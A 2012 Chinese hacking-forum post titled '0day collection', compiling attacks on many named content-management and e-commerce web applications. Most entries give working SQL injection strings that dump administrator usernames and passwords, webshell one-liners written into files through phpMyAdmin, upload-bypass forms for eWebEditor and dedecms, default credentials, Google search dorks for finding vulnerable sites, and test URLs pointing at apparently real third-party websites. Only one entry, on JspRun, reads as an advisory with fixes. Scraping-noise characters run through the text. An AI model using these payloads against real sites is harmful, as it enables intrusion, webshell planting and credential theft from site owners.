找回密码
 立即注册
查看: 3997|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本
' ?3 z) E* Q* ]
4 E! u1 h; p4 e7 J8 H/ X直接上exploit:
3 G9 B4 Z! L+ `* t7 H& K, ~$ Ejavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));+ U! ~7 z' ^4 i2 b; O
test:http://www.tb11.net/system/xitong/shownews.asp?id=2101 z6 U9 }, @3 _" V5 W
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 L2 t! C& C: U+ [8 \7 l
Asprain论坛 注册用户 上传图片就可拿到webshell* y5 L- d; r% r- q! ?2 D) ~% q/ y

! F6 M2 u. z% n8 A% r( G9 p9 q* dAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
6 M* o0 e: k  G' Q% Q. a' [% r1.txt存放你的一句话马 如:<%execute(request("cmd"))%>9 y. Q0 y4 e& ^2 O) t7 t/ a
2.gif 为一小图片文件,一定要小,比如qq表情图片1 B5 g2 s1 r. U) J1 {0 F
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
- a+ i" r/ x4 A# @2 b: ~4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了- {! r2 D, a; I
5.q.asp;.gif
( `( H$ I( L2 u& U& a7 a& j* Ogoogle:Powered by Asprain, M  N! n  N/ A7 d, L# ?4 R! t
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 O$ U' {* D# W* u& d1 p: m3 `  _7 M+ k5 r
ShopNum1全部系统存在上传漏洞。) c" s2 n9 k) q) W: x

4 |" h' m1 u& y8 ~2 n首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。( S3 [* R- Z) |6 B6 i
按说明 提示登录后台。。
4 d7 E. D8 d/ L在后台功能页面->附件管理->附件列表
1 ?5 L' N6 ~% s7 S& `可以直接上传.aspx 后缀木马
! i# d8 B: K4 T8 ^! Vhttp://demo.shopnum1.com/upload/20110720083822500.aspx4 u/ S! x9 P# p' S" p
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------; l  E6 S- C% y# I, M' @
  E, Z; G" l" c  K- y* S
牛牛CMS中小企业网站管理系统 上传漏洞8 o* R& `3 f  G& G8 h

. Q  Y$ h7 f3 a牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。4 F9 \  {7 }3 r. b/ @9 m
后台:admin/login.asp& N" a. I8 A8 l
ewebeditor 5.5 Nday2 Q& F7 b9 s9 _) ?% q
exp:8 @, W( H& r; b
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?% E% |# @8 f5 W3 I& Z
<input?type=file?name=uploadfile?size=100><br><br>?
2 b  Z5 \& Y' h3 B3 E) k6 }<input?type=submit?value=upload>?
" c" n7 W" [* k2 f$ f</form>+ ]. b/ \% n+ E) u2 j  |
ps:先上传小马.
; v8 z" T- [" x, I* t$ Pinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏0 U) R* Q6 E1 k. U* ?6 k* I# N

8 I5 `. R( Z, |6 c: Y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 @# t' N( K8 n, H9 h' E
8 j6 U# G( k3 a0 Z; U% x  L
YothCMS 遍历目录漏洞
7 ~; G- C5 `% A5 L2 g  |, `9 x
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
% p1 _( O8 I  j" b默认后台:admin/login.asp& P. ~% H! {& L  n) d
遍历目录:
$ s0 u! x4 j/ A0 j8 x) F0 d' Aewebeditor/manage/upload.asp?id=1&dir=../+ m5 E, H' `! z7 m  C' q# u& s
data:
  i/ }0 L# r2 }http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa9 p5 j- D" Q( S- N- F/ O
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 U5 ~- m' Z; C- \4 `* `! ^$ f; W
- U) c9 H( l8 uNet112企业建站系统 1.0
; G3 D" l5 R2 f$ P( B# G" l% A8 }9 @9 d9 Y( h$ g5 z) C" N+ A
源码简介:+ Z4 s, ]! ^: H% u: n
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。6 ?& |; l& T9 }0 k/ a, t! u; [( {$ s
添加管理员:
% S* S6 q4 h6 N$ Zhttp://www.0855.tv/admin/admin.asp?action=add&level=2
, N3 X8 i5 A) p9 V, @3 M$ Y其实加不加都不是很重要,后台文件都没怎么作验证。
9 Q5 ^" i2 O1 @: ~, w' }1 t上传路径:; ~! f* a  N, H% V0 t( t
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
. i9 v3 N- v9 |) P; _/ m  I9 Nhttp://www.0855.tv/inc/Upfile.asp?Stype=2
" P, X. K7 V- t9 B2 V  G怎么利用自己研究。
, K1 T1 W* }! r2 p3 d4 G遍历目录:" |* G4 b+ F$ ?5 u  S/ r1 T
http://www.0855.tv/admin/upfile.asp?path=../..4 F$ t% g' Q/ \. k" A- z
如:
5 E, j1 \- ~+ S- r7 i) q) u0 \7 fhttp://www.0855.tv/admin/upfile.asp?path=../admin
. v) M7 Q4 K: R+ j1 Lhttp://www.0855.tv/admin/upfile.asp?path=../data
9 J5 W% p8 x" L--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 a; F6 J7 M/ X- z/ d  I6 }. w2 G: o
易和阳光购物商城通杀 上传漏洞- n8 K1 Q" h+ n" Q  I

0 H7 l8 g9 k- _! ?2 ~前提要求是IIS6.0+asp坏境。4 y3 i3 s3 i, o/ C! w
漏洞文件Iheeo_upfile.asp - g$ t3 i! N$ l! ^9 T2 _
过滤不严.直接可以iis6.0上传# A4 E% c- I& ~* n
把ASP木马改成0855.asp;1.gif
  n6 m/ ~) O& y2 f7 ?6 }直接放到明小子上传
) G5 E4 Z- G! c7 F7 l/ BGoogle搜索:inurl:product.asp?Iheeoid=" ?" w& H7 ]2 n. f, P9 ?  o! h9 ?
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ S2 T3 {8 d9 b& B9 O6 R3 L8 ]- [% ~8 H9 a) B
phpmyadmin后台4种拿shell方法
# D# Z. R1 Y4 h8 a
; o4 Z5 ^. A4 w( G6 l& n+ ~方法一:  d& D* l9 k( h5 e
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );+ v7 M# E/ p( B9 S+ e8 W" T  a
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');! n; ]: q- S$ a
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
/ J2 t) B- y5 @( R4 l----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
; A1 h  X. P1 N- ~一句话连接密码:xiaoma
0 ^6 N! u! `& J9 k/ r5 v方法二:
# r0 p$ M& ]. i, d* R) E8 GCreate TABLE xiaoma (xiaoma1 text NOT NULL);3 |. n: p0 f9 Z& l4 X, q
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');8 ?  b# {% Z' L3 [8 f% V
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';" ?2 s. N+ M0 r' i. C2 Y
Drop TABLE IF EXISTS xiaoma;7 [  ~4 }: L. N5 [2 z; ]
方法三:
9 k( k7 {) G! Z0 `  U读取文件内容:    select load_file('E:/xamp/www/s.php');
2 L/ m3 j0 h9 C; R1 |写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
9 R5 R. R. l& L- ]6 v0 ncmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
, R$ ?, T. k( O6 L/ |% j5 j4 \; b方法四:
' U! Y' w. d7 `select load_file('E:/xamp/www/xiaoma.php');9 r/ P" V6 V+ L  C0 ]& H/ o8 Q
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
& f5 E' t# `& V- R- t* i然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir  _( {) _) V" B5 \, w9 |' C
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. C1 P$ M; j5 b$ v7 W2 O( o% U7 R

8 v3 |* c8 Z* q9 E( {0 l% w传信网络独立开发网站源码0day漏洞1 U6 X0 e$ M8 {- [" z& e6 N. S

( E. m2 @! j0 j后台system/login.asp
  C* \9 |% _2 O7 W( O) I进了后台有个ewebeditor
( `  [! d" j* N6 _; }3 hGoogle 搜索inurl:product1.asp?tyc=; d" V* ^" H( J
编辑器漏洞默认后台ubbcode/admin_login.asp$ W2 y" W3 v; J. d; d
数据库ubbcode/db/ewebeditor.mdb
+ ~) M6 I+ u7 v+ `9 ^默认账号密码yzm 111111
/ Q" f) G7 T, D2 o1 V1 _" x$ S, N
拿webshell方法( w9 a/ L) i. U% C
登陆后台点击“样式管理”-选择新增样式
/ S, D1 F* y, x' r样式名称:scriptkiddies 随便写 1 l8 u2 C+ D! b
路径模式:选择绝对路径 2 J$ x+ s  u5 {# d: z' p+ O; }
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx' v, W1 i5 a9 e+ {" h. c0 C' W
图片类型比如就是我们要上传的ASP木马格式
* ?' }, {1 |, l; N6 N- C上传路径:/
, y/ a1 k& e7 h3 E* f6 w- ?图片限制:写上1000 免的上不了我们的asp木马/ A4 \3 h8 l' Z8 f% X. m& s
上传内容不要写
* A' i; v' O( ?7 s: ~: J& b可以提交了 6 C& D: N  F+ z3 v: B- |7 Q4 ]4 `
样式增加成功! 1 @1 I& X, z/ {& ?0 e
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 ' \7 O& S5 S$ R% O9 T! D9 R
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
% t3 n0 V1 q8 n- e) g" K! J网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
0 }  r& O! E  A上ASP木马 回车 等到路径
9 |7 \* K6 _8 K) m2 q$ @* Q; C0 ^$ @9 G/ R% q. k- T8 q3 ]
后台:system/login.asp
- J7 S& i: f; g( f9 B" U0 i& k1 Z8 _Exp:" x- r- U" ^! C4 K: g  W4 f5 c
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master9 @  _) |3 o* S- {4 K3 g9 ~
测试:) }# y$ R* D7 I- L+ X
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master% A6 S- `$ r% e' c" `  I1 m
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master) h. J2 b" m3 M* \, r0 R$ ~
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( r9 O+ z& S+ A6 K5 x& X+ S/ @9 j( @) P3 l- [
foosun 0day 最新注入漏洞( e+ g: g; k) {" x( Y8 K2 q

* V) n; B# A5 L$ R! X& N漏洞文件:www.xxx.com/user/SetNextOptions.asp% L0 g; c7 r0 h9 X
利用简单的方法:5 [8 a0 V4 h3 Q: R1 X$ k
暴管理员帐号:! G+ N5 U) {" P/ J" ?" I
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin' ^; s& v% S3 b  j% t9 q5 z
暴管理员密码:
2 U* ]" V9 n( x! H! T  H$ Ihttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
9 X2 [7 s6 H/ d5 P3 c2 \--------------------------------------------------------------------------------------------------------------------------------------------------------------------------! f9 H5 C0 z1 Y8 g

  _5 W( X- ]2 H网站程序的版权未知!
! `7 E' X, b& u4 s: M! U, h' D" g6 p6 _$ V& ~; Z
默认网站数据库:
% C" z: _9 m# P# b: g: qwww.i0day.com/data/nxnews.mdb6 G6 F8 Y9 ~  n- C5 j& P3 ], I
ewebeditor 在线编辑器:
2 |# n$ n/ g) T! H* m& |编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
- e) u' v) S8 L/ b- a6 s8 C4 U* _登录地址:ewebeditor/admin_login.asp
# V: P+ @' A' N7 K5 K( o; ~默认密码:admin  admin8 o' \5 S' M6 G: p! r
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
: z* B0 R  U; v( O" N' [$ M$ ~" I% c% b  h) q1 W( f2 p% A' C  S
Sql注入漏洞:6 t6 I/ F. Z/ @9 S
http://www.i0day.com/detail.asp?id=12
8 @0 v1 l4 m1 Z5 bexp:
! w9 Y4 D7 y$ Z5 `( _union select 1,admin,password,4,5,6,7,8 from admin/ Z! O  E3 h# L) Q& y2 t7 B( x/ F
爆出明文帐号/密码
+ K8 X* \9 n! t6 N7 W. O
0 R& G4 x0 L% w7 {2 }1 W上传漏洞:! H, @7 z' W* |2 ~# G  O* r# f: l+ V
后台+upfile.asp0 k4 ~& e2 ~; i' l0 l
如:7 x4 J3 o3 {! b+ Y$ K
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。( |; b4 b5 N& M8 A. R) C+ O. C$ w  k
shell的地址:网址+后台+成功上传的马
5 X9 {2 Q' X' i1 n7 J: d0 ]google:inurl:news.asp?lanmuName=9 H" r4 T* |; |& w
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: u! I3 c3 ~" t, `" s, v
" p, S" n8 s! `9 n0 T% ?4 E/ \6 [! ?dedecms最新0day利用不进后台直接拿WEBSHELL
! {- ?2 O  X) s, g2 M+ X6 S$ Z/ C" o$ S$ I
拿webshell的方法如下:
1 m  X- X8 M; N) D# O) z8 f网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.8 ~, A: o8 [& n4 r
前题条件,必须准备好自己的dede数据库,然后插入数据:( _6 N/ |' Y' Q2 J+ p
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); " C+ ]* t8 Y* E; Z! U! n

* ?; I  V/ b; T" b! R  }0 D再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。5 \2 j% d( F$ H5 \# [  w. B1 U
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
, D5 V  V4 O2 N6 k. V+ {<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />, g) g: I+ y! G% i# @& H# o8 Q
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />8 w+ u2 \4 T: N: [  h6 F# O; F6 ?0 E* P
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />1 b- Q2 C; K5 ~+ y8 |3 \: }
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />- X( l: H! Y1 q' W# L9 ]. L
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
2 K. ?8 c2 {3 ?4 W<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
$ r% T4 E3 k6 b8 h<input type="text" value="true" name="nocache" style="width:400">. g5 L+ U8 q: k0 g
<input type="submit" value="提交" name="QuickSearchBtn"><br />
) O. O7 Z' q" \5 a8 @</form>
. E( a4 y2 z+ i' }; u0 l' f<script>
: Y) m6 Q) m; l* f, E0 P  C: B$ Sfunction addaction()
5 ?9 x7 R. P$ g: v{5 ]$ q& C/ {- t  G0 C0 `
document.QuickSearch.action=document.QuickSearch.doaction.value;* W2 U) o6 g; Q" c
}: ]) n. P+ h" n& C% e9 X" m5 {5 _
</script>
1 U# N6 j2 o& u- w. C; ~-----------------------------------------------------------------------------------------------------------------------------------------------
' o+ b+ @, @* v  J2 Y3 B
7 f6 o( g9 n' d  `1 wdedecms织梦暴最新严重0day漏洞' O& F; q. K; F- l, w6 F
bug被利用步骤如下:; J* t" \  U1 r$ |$ x4 g
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
' h& c; r7 u- {/ `& t1 R把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
5 a6 o; Y; X: j* s2 n9 p9 J-------------------------------------------------------------------------------------------------------------------------------------------
6 l, T8 C3 s& H9 r, ^+ W, I9 x2 N1 s' ~6 t9 t2 |  r. }' m. X
多多淘宝客程序上传漏洞
) Q  M! e* s+ i# r# w: A' y漏洞页面:( b( J+ E1 _5 W& F' v% E
admin\upload_pic.php2 W1 `+ y$ `8 j& v7 W/ W6 @& e
传送门:
8 _4 v5 [1 F' q/ p  z4 A2 E" ahttp://www.www.com/admin/upload_pic.php?uploadtext=slide12 p1 f9 `8 I+ K5 [5 s/ P
PS:copy张图片马 直接  xxx.php 上传抓包地址!' E/ p. r6 I0 ]4 o1 c
------------------------------------------------------------------------------------------------------------------------------------------------------
! m6 r! t; S/ z$ b1 C9 W% T
( B7 C. s' F2 Y; J5 g& F无忧公司系统ASP专业版后台上传漏洞
5 d( s$ V' D6 `% R; V! A6 |, d$ }漏洞文件 后台上传
' T  `$ e% O2 }2 @* eadmin/uploadPic.asp
% j, j  ^5 z# z! m7 f漏洞利用 这个漏洞好像是雷池的0 T/ R6 Y  Q5 Y, p; U/ r1 ~7 t5 c! X9 t
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
# o) ^5 Y/ {5 L% N2 I+ y; @等到的webshell路径:
& u$ W8 H3 v( W5 f/UploadFiles/scriptkiddies.asp;_2.gif, m8 ~; E& I6 F" S2 h$ ^
---------------------------------------------------------------------------------------------------------------------------------------------------
- n+ }$ R) U- S" X6 I! w# z: g; m1 q
住哪酒店分销联盟系统20102 U+ L/ g6 ^/ ~% M) x
Search:1 p4 c+ `, ]) s7 P! E
inurl:index.php?m=hotelinfo! Z9 {, ?6 \6 k! |
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin4 n  @4 T( b% N1 t. y: ?5 k
默认后台:index.php?m=admin/login
  V, B/ F* H! c" d0 ]9 s--------------------------------------------------------------------------------------------------------------------------------------------------! E! q4 z$ z; _7 c3 J

/ w4 p; R: I4 T, k0 y4 f* @inurl:info_Print.asp?ArticleID=( w' X2 h# B2 ]; p& i* Y
后台 ad_login.asp
+ n3 l! B, J, U爆管理员密码:. t; G) C: u) b. ^
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin: t. }; E' ~. A" Y! N) f
------------------------------------------------------------------------------------------------------------------------------------------------------------' \0 k: b% k9 [3 W$ v7 u
8 I* i" f: r) D, p7 ^
搜索框漏洞!$ }. ?" h* ^3 l5 i
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='; v6 @! c% ]- `  D/ D& w+ h
--------------------------------------------------------------------------------------------------------------------------------------------------------3 I) K7 f# ]4 E2 @

2 z- V* A! X8 B* }! w4 I关键字:- }& @( z1 `1 u0 r# o% f2 S
inurl:/reg_TemletSel.asp?step=2
# L- _; ?; Y' {  l4 r; ]或者
: x; F7 \, _6 d9 J8 x, l电子商务自助建站--您理想的助手
; Y" m; b4 [1 y+ Q# _: q2 v" L8 n-------------------------------------------------------------------------------------------------------------------------------------------------
  ^7 R3 B+ a9 R. s. |6 l7 [7 s3 K, D3 X) o
iGiveTest 2.1.0注入漏洞2 I& p1 X- Z1 B4 B5 B
Version: <= 2.1.02 I3 C7 J# c9 g$ v: K" C' e
# Homepage: http://iGiveTest.com/
# a5 T, q" u6 [谷歌关键字: “Powered by iGiveTest”
9 \+ f; @2 k) A% p0 Q4 V. Q* t) Y+ o随便注册一个帐号。然后暴管理员帐号和密码8 q; i2 G1 U; G  \' G; N
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (19 U, p" B2 D# q+ E
------------------------------------------------------------------------------------------------------------------------------------------------
: Q" ~% D. l. J8 Y0 S# u
0 E+ {! y8 C* K  i7 `CKXP网上书店注入漏洞
  f* A, O5 L9 e# i7 v3 Y; r工具加表:shop_admin 加字段:admin
( B. B2 @0 U: p7 n2 |( {6 t! n后台:admin/login.asp / @: I1 f1 D+ d4 e! Y% ?) v4 ~
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/- y. x, e# Q* o( a9 ?
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
* H$ B  ^' X2 F% L+ h8 }4 }. D5 J) B--------------------------------------------------------------------------------------------------------------------------------------------------------------------------% \% m5 v8 ^6 ^+ [. g) e

2 y4 r5 z& e$ Q# j8 }段富超个人网站系统留言本写马漏洞% _( V% M: V3 y
源码下载:http://www.mycodes.net/24/2149.htm
5 {) d# p# M2 t  K4 ^: f4 Z2 @addgbook.asp 提交一句话。
  m# R5 x* }9 S  G5 a连接: http://www.xxxx.tv/date/date3f.asp
4 c( |$ g+ y! e. s7 \2 I" u* l- \google:为防批量,特略!* g) I0 P, h- _! |' r5 [
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ v0 j  z6 {2 u, W3 \5 Q

0 B7 S" b2 k! |智有道专业旅游系统v1.0 注入及列目录漏洞
3 }" U' a6 a8 d# ]" \( L/ P- a默认后台路径:/admin/login.asp1 ?% M- ^& i( t3 q' S) m( b6 ]  G; `
默认管理员:admin% O. W8 h( n1 U
默认密码:123456! x0 b2 p, G4 x( n
SQL EXP Tset:7 _- @; y+ I3 G" K" D' A
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
6 i3 b$ _3 e# w7 M. [4 l& w------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 ]) R+ o( A, g2 |  c

: P$ N2 v8 X9 d4 C6 i# \0 Wewebeditor(PHP) Ver 3.8 本任意文件上传0day9 Y- t6 K: j/ u. l; f; F# y1 g/ R% e
EXP:
; J3 O4 @9 k' S' t! F* q( n+ m2 `, A<title>eWebeditoR3.8 for php任意文件上EXP</title>( {" P! ~: J" Z* n! D: Y: h+ H) m
<form action="" method=post enctype="multip' U# e- S4 u' `8 D, Y
art/form-data"> + o9 M1 G0 Y2 D3 l9 v/ B4 W1 E- c  k
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> : B% c6 U. z3 b8 }. M
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
" g/ v" G6 t- l! y<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 6 q! h- q' E8 r8 B/ k" m$ X! Y: L
file:<input type=file name="uploadfile"><br> + o& U) \" ^5 k% h; T; Q5 g
<input type=button value=submit onclick=fsubmit()>
# y$ l2 ~) T8 `1 O</form><br> 8 S9 Y, @) I# j; @
<script>
! v1 h1 Q4 x* x9 ?& n' bfunction fsubmit(){ 1 _) ~/ c( S3 X2 H
form = document.forms[0];
3 j+ d# Z' w. o- ]form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
% h  g9 Y+ w3 |" Ralert(form.action); 2 n5 E9 o1 W9 Z3 S3 g& V; n& w
form.submit();
* b+ h1 y- |+ t5 v! q0 Q8 @! I' A} " X$ [/ j$ R" y5 }: j$ w' j
</script>
" r8 u& U# a; n+ D注意修改里面ewebeditor的名称还有路径。! P! Y! q$ g- \, N3 \3 h
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------( G% s7 ~/ H3 x8 ^- W
* [1 D" E8 p5 h4 \6 ]
提交’时提示ip被记录 防注入系统的利用
/ M( w) e# V. |/ ^- l, \" ]  L网址:http://www.xxx.com/newslist.asp?id=122  k$ e, b5 E! `4 Y& d
提示“你的操作已被记录!”等信息。' x: u0 R" p4 }% r
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。, {8 v. t# s, G& S
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 I, i5 a9 Y+ I
7 J/ y4 c6 @( o/ j
西部商务网站管理系统 批量拿shell-0day& I- t9 L0 S. V
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb # \5 X6 M7 l4 C1 ^) ]
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
' M" ]* K4 e5 b+ k2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合, F1 }  @2 Q( _9 s
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂& G3 F9 I7 h9 b. W% A' l: e, d, \* o
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 m. A9 C! o+ S5 }5 O# I
7 J7 c7 x  `$ j: @3 u
JspRun!6.0 论坛管理后台注入漏洞  Q6 ]+ f! `# v- a7 t% J# X

! s( r2 c* @- r" y1 M0 DSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
  R9 L+ u, L. BJspRun!6.0
3 B, ^/ Q) C  U% j8 W' n" y# J漏洞描述:, \6 s9 d; V, _& ^. A7 R
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
) y0 i4 ]+ Y) ]* k) k! P在处理后台提交的文件中ForumManageAction.java第1940行8 l( I8 j" |1 I
String export = request.getParameter("export");//直接获取,没有安全过滤
5 e3 E2 j1 B& A4 kif(export!=null){, G5 Z4 O3 }3 N1 d
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
- ?, E% x% E6 k; aif(styles==null||styles.size()==0){( H* K* I1 H/ u) P3 [$ d" I. H
<*参考( {+ ?$ G2 h2 b: X3 i) w) z
nuanfan@gmail.com
" M2 v+ D) X6 l- e& H*> SEBUG安全建议:
0 Z- y8 o% h8 }+ a, Twww.jsprun.net' o; l' a3 i! M) V
(1)安全过滤变量export+ i: W: y+ ~1 X( I, i! u9 C) M/ [5 k
(2)在查询语句中使用占位符$ ~- X+ g3 p5 z8 N  o3 a
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------! `- l5 |# x- p4 r. V

, d/ T; e  m) }( Z. f) H( |乌邦图企业网站系统 cookies 注入
- L9 G/ J' j- U9 _  s
* l8 r3 G8 x' A  v程序完整登陆后台:/admin/login.asp
) [9 x2 v( s- @默认登陆帐号:admin 密码:admin8881 o( ]! ^+ c& B. |: V5 e
语句:(前面加个空格)4 G9 x+ @7 y! o$ e
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
9 p& f2 L3 E* Q% }" s. V% O或者是16个字段:
5 b: H8 v9 L: M$ t5 |/ M) q7 ]- s5 band 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
& Q; ~2 R1 y3 \. Y: S爆不出来自己猜字段。
7 d% ]) e, X/ l! X# R% G7 _. i注入点:http://www.untnt.com/shownews.asp?=88
4 s" Y! I6 A) w1 T+ S" Hgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp& u! m4 P. K5 U  I* C& _+ K$ T
关键字:" L" Y1 H: ]/ w- e- M; f2 b
inurl:shownews?asp.id=
4 i" M: R9 A( Z8 D- [. j6 k-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 t$ E6 b) p: H+ z* G. x) f. n% H+ B+ a- w# ?2 r7 h: T
CKXP网上书店注入漏洞2 b, P: v' ?0 F4 ?- K& m9 j
9 g: N1 i6 N$ C# C+ P
工具加表:shop_admin 加字段:admin! x2 R& u& W( m0 s  I
后台:admin/login.asp 3 @. `4 E( x1 P
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/0 T" u! m4 s! O% V
